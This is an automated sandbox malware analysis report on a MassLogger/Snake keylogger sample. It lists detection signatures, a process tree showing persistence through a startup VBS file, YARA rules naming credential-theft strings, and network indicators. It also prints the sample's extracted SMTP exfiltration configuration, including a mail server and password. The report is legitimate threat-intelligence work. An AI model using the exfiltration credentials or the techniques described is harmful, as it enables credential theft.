Edit tour

Windows Analysis Report
PI 00928292828.exe

Overview

General Information

Sample name:	PI 00928292828.exe
Analysis ID:	1630712
MD5:	026760fb65d01ed810dd5195eb848499
SHA1:	786327727862a62043c979761b749a55818abb3c
SHA256:	c294f4ea03dbbc49bdbec757d718ac1f7cd8015e197ec956416a07debac69ec9
Tags:	exeMassLoggeruser-threatcat_ch
Infos:

Detection

MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Joe Sandbox ML detected suspicious sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PI 00928292828.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\PI 00928292828.exe" MD5: 026760FB65D01ED810DD5195EB848499)

PI 00928292828.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\PI 00928292828.exe" MD5: 026760FB65D01ED810DD5195EB848499)

wscript.exe (PID: 7536 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

skype.exe (PID: 7600 cmdline: "C:\Users\user\AppData\Roaming\skype.exe" MD5: 026760FB65D01ED810DD5195EB848499)

skype.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Roaming\skype.exe" MD5: 026760FB65D01ED810DD5195EB848499)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "chidi000@mzgold.ir", "Password": "goodGod2024", "Server": "mail.mzgold.ir", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x103cf:$a1: get_encryptedPassword 0x106f7:$a2: get_encryptedUsername 0x1016a:$a3: get_timePasswordChanged 0x1028b:$a4: get_passwordField 0x103e5:$a5: set_encryptedPassword 0x11d41:$a7: get_logins 0x119f2:$a8: GetOutlookPasswords 0x117e4:$a9: StartKeylogger 0x11c91:$a10: KeyLoggerEventArgs 0x11841:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1701269663.00000000042D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x111d4f:$a1: get_encryptedPassword 0x112077:$a2: get_encryptedUsername 0x111aea:$a3: get_timePasswordChanged 0x111c0b:$a4: get_passwordField 0x111d65:$a5: set_encryptedPassword 0x1136c1:$a7: get_logins 0x113372:$a8: GetOutlookPasswords 0x113164:$a9: StartKeylogger 0x113611:$a10: KeyLoggerEventArgs 0x1131c1:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfb2f:$a1: get_encryptedPassword 0xfe57:$a2: get_encryptedUsername 0xf8ca:$a3: get_timePasswordChanged 0xf9eb:$a4: get_passwordField 0xfb45:$a5: set_encryptedPassword 0x114a1:$a7: get_logins 0x11152:$a8: GetOutlookPasswords 0x10f44:$a9: StartKeylogger 0x113f1:$a10: KeyLoggerEventArgs 0x10fa1:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.2941514043.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000003.00000002.1837219390.00000000031F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.2941514043.0000000000417000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000000.00000002.1704081757.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1701269663.0000000004435000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1691908965.00000000032D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7340	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x65771:$a1: get_encryptedPassword 0x65a8a:$a2: get_encryptedUsername 0x65520:$a3: get_timePasswordChanged 0x65641:$a4: get_passwordField 0x65787:$a5: set_encryptedPassword 0x6708a:$a7: get_logins 0x66d3b:$a8: GetOutlookPasswords 0x66b2d:$a9: StartKeylogger 0x66fda:$a10: KeyLoggerEventArgs 0x66b8a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PI 00928292828.exe PID: 7384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7384	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: PI 00928292828.exe PID: 7384	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: skype.exe PID: 7600	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: skype.exe PID: 7600	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x40fff:$a1: get_encryptedPassword 0x41318:$a2: get_encryptedUsername 0x40dae:$a3: get_timePasswordChanged 0x40ecf:$a4: get_passwordField 0x41015:$a5: set_encryptedPassword 0x42918:$a7: get_logins 0x425c9:$a8: GetOutlookPasswords 0x423bb:$a9: StartKeylogger 0x42868:$a10: KeyLoggerEventArgs 0x42418:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: skype.exe PID: 7648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: skype.exe PID: 7648	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PI 00928292828.exe.5ee0000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.skype.exe.4386598.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.PI 00928292828.exe.5ee0000.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.PI 00928292828.exe.400000.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
1.2.PI 00928292828.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14147:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13645:$a3: \Google\Chrome\User Data\Default\Login Data 0x13953:$a4: \Orbitum\User Data\Default\Login Data
0.2.PI 00928292828.exe.44b4218.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.PI 00928292828.exe.44b4218.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PI 00928292828.exe.44b4218.1.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.PI 00928292828.exe.44b4218.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PI 00928292828.exe.44b4218.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.PI 00928292828.exe.44b4218.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12347:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11845:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b53:$a4: \Orbitum\User Data\Default\Login Data 0x1294b:$a5: \Kometa\User Data\Default\Login Data
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
0.2.PI 00928292828.exe.44b4218.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14147:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13645:$a3: \Google\Chrome\User Data\Default\Login Data 0x13953:$a4: \Orbitum\User Data\Default\Login Data 0x1474b:$a5: \Kometa\User Data\Default\Login Data
Click to see the 12 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , ProcessId: 7536, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 217.144.107.148, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PI 00928292828.exe, Initiated: true, ProcessId: 7384, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs" , ProcessId: 7536, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PI 00928292828.exe, ProcessId: 7340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skype.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T07:56:18.203364+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	158.101.44.242	80	TCP
2025-03-06T07:56:26.265870+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	158.101.44.242	80	TCP
2025-03-06T07:56:29.406485+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	158.101.44.242	80	TCP
2025-03-06T07:56:37.312734+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PI 00928292828.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\skype.exe

Avira: detection malicious, Label: TR/AD.SnakeStealer.vpkoz

Found malware configuration

Source: 1.2.PI 00928292828.exe.400000.0.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "chidi000@mzgold.ir", "Password": "goodGod2024", "Server": "mail.mzgold.ir", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\skype.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: PI 00928292828.exe	Virustotal: Detection: 45%			Perma Link
Source: PI 00928292828.exe	ReversingLabs: Detection: 42%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PI 00928292828.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: PI 00928292828.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PI 00928292828.exe, 00000000.00000002.1704302032.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PI 00928292828.exe, 00000000.00000002.1704302032.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PI 00928292828.exe, 00000000.00000002.1704203575.0000000005F40000.00000004.08000000.00040000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000043A7000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.0000000004455000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 4x nop then jmp 00EF9741h	1_2_00EF9490
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 4x nop then jmp 00EF9E6Ah	1_2_00EF9A50
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 4x nop then jmp 00EF9E6Ah	1_2_00EF9A40
Source: C:\Users\user\Desktop\PI 00928292828.exe	Code function: 4x nop then jmp 00EF9E6Ah	1_2_00EF9D97
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4x nop then jmp 00A49731h	4_2_00A49480
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4x nop then jmp 00A49E5Ah	4_2_00A49A30
Source: C:\Users\user\AppData\Roaming\skype.exe	Code function: 4x nop then jmp 00A49E5Ah	4_2_00A49D87

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 217.144.107.148:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 217.144.107.148 217.144.107.148
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 158.101.44.242:80

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 217.144.107.148:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: mail.mzgold.ir

Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.0000000002832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000027C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PI 00928292828.exe, 00000001.00000002.2945608145.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2945608145.0000000002C48000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, skype.exe, 00000004.00000002.2945164614.000000000283E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: PI 00928292828.exe, 00000000.00000002.1701269663.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, PI 00928292828.exe, 00000001.00000002.2941514043.0000000000413000.00000040.00000400.00020000.00000000.sdmp, skype.exe, 00000003.00000002.1859555653.00000000045C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
